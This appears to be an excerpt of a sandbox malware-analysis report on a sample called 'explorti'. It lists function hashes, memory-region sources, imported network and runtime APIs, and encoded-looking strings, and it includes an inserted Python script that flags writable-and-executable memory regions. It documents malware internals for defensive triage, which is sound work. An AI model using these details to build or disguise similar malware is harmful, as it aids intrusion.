                    • Instruction Fuzzy Hash: 98F09EAB20C204FDD2A14B54B5087F63B69FBC6330730C42BF413D1581E36418E5A7B0
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d252932f37530020a98f5148300ce80121e3457303d76b82f4ebe6f175539cb8
                    • Instruction ID: 885bb20c3be483039dfc04705873447bb4b78866f6d2d609eb6240589cfc2cb2
                    • Opcode Fuzzy Hash: d252932f37530020a98f5148300ce80121e3457303d76b82f4ebe6f175539cb8
                    • Instruction Fuzzy Hash: 79E0559B208608ADA1A15750360CBF3376CF7D2332330C27BF863D1181E4542CD6AAB4
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a273f578f87ecbb5d97504e6beeb2693c64986823332e36836921548817ae3e
                    • Instruction ID: a8db037f7258be526a51ba4e3c3e20a9a73979c0842db03b9122ec3511888785
                    • Opcode Fuzzy Hash: 0a273f578f87ecbb5d97504e6beeb2693c64986823332e36836921548817ae3e
                    • Instruction Fuzzy Hash: ACE020AB208101BDE17196553604BF7777CB7C6330330D576F463D6281E15819D667B5
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb724b0ff105bfb4570f245d86d8534a5ff57a11a9462fa82ddd182e97e11954
                    • Instruction ID: 6b887e662e7233e52fc3a128290c3ec32a7fc88e73ce6564d112da46c06e605b
                    • Opcode Fuzzy Hash: bb724b0ff105bfb4570f245d86d8534a5ff57a11a9462fa82ddd182e97e11954
                    • Instruction Fuzzy Hash: 33E02C9B229004BDA16186403609BF26B38F2C6230330C6B3A4A2E2081E0589ADB22B4
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9bea3764b5a19243806e0211f3145fc3194f410c197aa27fe451083d75bd5b3c
                    • Instruction ID: e42784c7c54ded2967337b8fdb020a4054e4fd0beaea9e73b8152f1f70c2bb9b
                    • Opcode Fuzzy Hash: 9bea3764b5a19243806e0211f3145fc3194f410c197aa27fe451083d75bd5b3c
                    • Instruction Fuzzy Hash: 28D0222F209210DDE2A0E28232057F663A8B7C4331330D973E092C2180E02D19DB6BB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 111$246122658369$4dd39d$JgNn9TI9$PJ==$PzE+$Xt==$ZMs=$ZMw=$Zww=$3D$eBs
                    • API String ID: 0-973685055
                    • Opcode ID: 1f33bfe526fd8d21b38ad8a0c1d018edf721951402819fa3305a45f7774dfcc7
                    • Instruction ID: 8d570c5ed407cef0e83cba50b749950a48d7b3f0b9c43fe317083bb6193e1538
                    • Opcode Fuzzy Hash: 1f33bfe526fd8d21b38ad8a0c1d018edf721951402819fa3305a45f7774dfcc7
                    • Instruction Fuzzy Hash: AE82D77091428CDBEF15DF68C9497DE7FB5AF46304F604299E8046B3C2C7B99A84CB92
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$eBs
                    • API String ID: 4168288129-347604477
                    • Opcode ID: 954d62ee9d001f5d6c1e3eb5a640c3067af56e595d088179556953672d951f03
                    • Instruction ID: db0f96515aeb8d927c426c214bd97d62319cccee0f9fe7ec64329403d59d46ac
                    • Opcode Fuzzy Hash: 954d62ee9d001f5d6c1e3eb5a640c3067af56e595d088179556953672d951f03
                    • Instruction Fuzzy Hash: 79C23871E046288FCB25CE28ED407EAB7B5EB88305F5441EBD84DA7240E77CAE818F45
                    APIs
                    • recv.WS2_32(?,?,00000004,00000000), ref: 003EDFEB
                    • recv.WS2_32(?,?,00000008,00000000), ref: 003EE020
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID: eBs
                    • API String ID: 1507349165-1845495228
                    • Opcode ID: 35982cba0311f22f8f1ac44f0f6c2d51fc8c47d7b337fcacde7ea82cbf34227d
                    • Instruction ID: 173f329b6b323a3fcc6265e0b7cf8862cf27306d31c269d6a5994f84c7b27b81
                    • Opcode Fuzzy Hash: 35982cba0311f22f8f1ac44f0f6c2d51fc8c47d7b337fcacde7ea82cbf34227d
                    • Instruction Fuzzy Hash: DB31F8719002989FD721CB6ECC81BEF77ACEB09720F110735E914E72D2DA75AC458B64
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 37259de212e73201d4ccf979b8385d5321c15323e918f58d185ebd65ea71d6c6
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: 8FF17F71E002299FDF14CFA9D9806AEF7B1FF48314F55826AE819AB344D774AE01CB94
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,003FCE55,?,?,?,?,003FCE8A,?,?,?,?,?,?,003FC400,?,00000001), ref: 003FCB06
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: e49bca10c7cc19835aa23b6b25383a18a46718ae328b678bb92585a2e9939e12
                    • Instruction ID: 61951e9cbc200c5687a0357be40c0dc523f6f627169e739920520b8c41e2e3c5
                    • Opcode Fuzzy Hash: e49bca10c7cc19835aa23b6b25383a18a46718ae328b678bb92585a2e9939e12
                    • Instruction Fuzzy Hash: 95D0223A69303C93CE032B80BC114BEBB0CDA02F503011031EA0E17120CA50AC004BE8
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: eBs
                    • API String ID: 0-1845495228
                    • Opcode ID: c417b58745181434092d64e8d7f4098a5f9c4b8524bfb86c6f83f1a38b2ce1db
                    • Instruction ID: 30458849559d45d2ada17912bb4327b060cb96218f05d6abf3251d0f7719c1cd
                    • Opcode Fuzzy Hash: c417b58745181434092d64e8d7f4098a5f9c4b8524bfb86c6f83f1a38b2ce1db
                    • Instruction Fuzzy Hash: 7D5180716087D18FD31ACF2D851623AFBF1BF99201F094A9EE0DA87292D775DA04CB91
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 192bbd0b10f317d3b8dec0b04b6023515f92f20c9da162f4f4cf720d8faf834f
                    • Instruction ID: c403240b4596b6002b1f0381ee533020bc142bc5950c9d91fb5d0ebd4932e2f0
                    • Opcode Fuzzy Hash: 192bbd0b10f317d3b8dec0b04b6023515f92f20c9da162f4f4cf720d8faf834f
                    • Instruction Fuzzy Hash: 062260B7F515144BDB4CCB9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9158648
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cced6df08d6a6ed67c0d73c48ed75db51d1fffd7e3ef0c1dcb06352fc74456b1
                    • Instruction ID: 8b7fbd46b5dd9507d8409e68f0f9d091659b08e65d8ef49ae2ab2f62eea7752a
                    • Opcode Fuzzy Hash: cced6df08d6a6ed67c0d73c48ed75db51d1fffd7e3ef0c1dcb06352fc74456b1
                    • Instruction Fuzzy Hash: 3FB17B31210615DFDB18CF28D486B667BE0FF05364F658659E89ACF3A1C339E992CB44
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 43937997a352f7ca02b81c26ba2bc4be041aa743b25004f95e9c051a5f6ff0c6
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: CB51357024C7495ADF388A2884967FF67FA9F42304F28049FE542D7782DA1D9DC6826E
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E23BE
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID:
                    • API String ID: 2659868963-0
                    Similarity
                    • API ID:
                    • String ID: 246122658369$Ip==$Krkk$Zww=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$eBs
                    • API String ID: 0-3760508568
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID: eBs
                    • API String ID: 32384418-1845495228
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID: eBs
                    • API String ID: 531285432-1845495228
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 003F723C
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: 0z?$py?$eBs
                    • API String ID: 3366076730-3098180262
                    Similarity
                    • API ID: __freea
                    • String ID: eBs
                    • API String ID: 240046367-1845495228
                    • Opcode ID: 135132e545dcf5008e08840360aa5112daa4c524ea71d81be31700a9d9e7d877
                    • Instruction ID: cd44c9a69589c142543867fe881338e7050696664a18e5dd72c9846e584bfa4d
                    • Opcode Fuzzy Hash: 135132e545dcf5008e08840360aa5112daa4c524ea71d81be31700a9d9e7d877
                    • Instruction Fuzzy Hash: 7B513772701226ABDF218F6AEC41EBB36A9DFC0750F56412AFD0497240D778DC5187A8
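The Memory Dump Source block above names every memory region the function dump was reconstructed from, and the fifth dotted field of each .sdmp name carries the Windows page protection (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE, 0x80 = PAGE_EXECUTE_WRITECOPY). Pages that are both writable and executable are what an unpacker or injected code needs, so they are worth pulling out during triage. The following parser is an added example written for this page; it is not Joe Sandbox code. The field layout it assumes for the .sdmp name (process, phase, dump id, base address, protection, state, type, module) is an assumption: the page documents none of it, and only the base-address field (which lines up with the report's "Offset: 003E0000") and the protection field are used to draw conclusions. The sample input is the block above, with the download-link text removed.

```python
import re
from dataclasses import dataclass
from typing import List

# Windows memory-protection constants from winnt.h (these values are certain).
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# ASSUMED field layout of a Joe Sandbox .sdmp file name (not documented on the page):
#   <process>.<phase>.<dump id>.<base address>.<protection>.<state>.<type>.<module>.sdmp
# Only <base address> and <protection> are interpreted; the other fields are captured
# but not relied upon.
SDMP_RE = re.compile(
    r"(?P<process>[0-9A-Fa-f]{8})\."
    r"(?P<phase>[0-9A-Fa-f]{8})\."
    r"(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<module>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass
class Region:
    name: str
    base: int
    protect: int
    module: int

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits (PAGE_GUARD 0x100, PAGE_NOCACHE 0x200, PAGE_WRITECOMBINE 0x400).
        return PROTECT_NAMES.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def writable_and_executable(self) -> bool:
        p = self.protect & 0xFF
        return bool(p & EXECUTABLE_MASK) and bool(p & WRITABLE_MASK)


def parse_dump_source(text: str) -> List[Region]:
    """Extract every .sdmp descriptor from a 'Memory Dump Source' block, in page order."""
    return [
        Region(
            name=m.group(0),
            base=int(m.group("base"), 16),
            protect=int(m.group("protect"), 16),
            module=int(m.group("module"), 16),
        )
        for m in SDMP_RE.finditer(text)
    ]


def rwx_regions(text: str) -> List[Region]:
    """Regions that code could both write to and run from (unpacker / injection candidates)."""
    return [r for r in parse_dump_source(text) if r.writable_and_executable]


# Sample input: the Memory Dump Source block of this report, copied from the page
# with the download-link residue removed.
SAMPLE = """\
• Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
"""

if __name__ == "__main__":
    for r in parse_dump_source(SAMPLE):
        flag = "RWX" if r.writable_and_executable else "   "
        print(f"{flag} {r.base:08X} {r.protect_name}")
```

On this block the parser finds twelve regions; only the PE header page at 003E0000 and the page at 00449000 are plain PAGE_READWRITE, while the ten remaining regions, including every code page, are writable and executable. That is the picture a manually unpacked image leaves behind, and it is a quick check to repeat on the other Memory Dump Source blocks in the report.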
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: _xtime_get$Xtime_diff_to_millis2
                    • String ID: eBs
                    • API String ID: 2858396081-1845495228
                    • Opcode ID: 9ecce0707f54d0755729e8404b71c6e636a4654ecb859db9399d6a875035420e
                    • Instruction ID: 8f3c9f5c6a3f98f0c0b3a3c0be8755372e193e35def1b21f5b8e5c80cb94a802
                    • Opcode Fuzzy Hash: 9ecce0707f54d0755729e8404b71c6e636a4654ecb859db9399d6a875035420e
                    • Instruction Fuzzy Hash: 665181319A011ECBCF13DF25C6A15BDB7B4EF08714B25A45ADA05DB655C730ED40CBA4
                    APIs
                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 003F792C
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 003F7938
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 003F7941
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                    • String ID: L+D
                    • API String ID: 4078500453-2164315478
                    • Opcode ID: ed800f02de858c4f5bebfd6e9a509c9cb25dfb6515d87945b90c247c7b64f2df
                    • Instruction ID: 813122f308ae626683d5dcc9eac6009bf664dcd6a66baf2631ddf855184c1928
                    • Opcode Fuzzy Hash: ed800f02de858c4f5bebfd6e9a509c9cb25dfb6515d87945b90c247c7b64f2df
                    • Instruction Fuzzy Hash: E831C5B19043089BD721DF64D846A7BB7E8EF14350F100A3EEA4AC7641E7B5EA54C7E1
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: 844761f72ad8a6e8b9cde347a5518ccf466dbb91b476777589b3b09af6e4ad46
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: 4CB1F2729442959FDB11CF28DC827EEBBA5EF45340F14816BD845EB341E6389D82CBA8
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __fassign
                    • String ID: eBs
                    • API String ID: 3965848254-1845495228
                    • Opcode ID: f53cdb45429f0e4a7396a549b6905becc8f10d31f7a5796e44ada5f761443705
                    • Instruction ID: 8a9e1f5b5e16b3140858a13de256ddbc94cf458951a9b1cd9abef391437039a9
                    • Opcode Fuzzy Hash: f53cdb45429f0e4a7396a549b6905becc8f10d31f7a5796e44ada5f761443705
                    • Instruction Fuzzy Hash: 9EC1AC75D002489FCF15CFA8D8809EEBBB5FF49314F28016AE855B7352D634AD8ACB58
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E2746
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003E27E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: eBs
                    • API String ID: 2970364248-1845495228
                    • Opcode ID: ad34a4cb695a47b3f36ee39fc89344b965274ce7c88e9a8329e7cd2fa3e42e42
                    • Instruction ID: 2aeea9bcfde6b19542649110307e5d789f218c6022e9b5d8c4879767dea56dbc
                    • Opcode Fuzzy Hash: ad34a4cb695a47b3f36ee39fc89344b965274ce7c88e9a8329e7cd2fa3e42e42
                    • Instruction Fuzzy Hash: 6E71A271A002589FDF05CF98C881BDEFBB9EF59314F14821DE805B7281D774A984CBA5
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
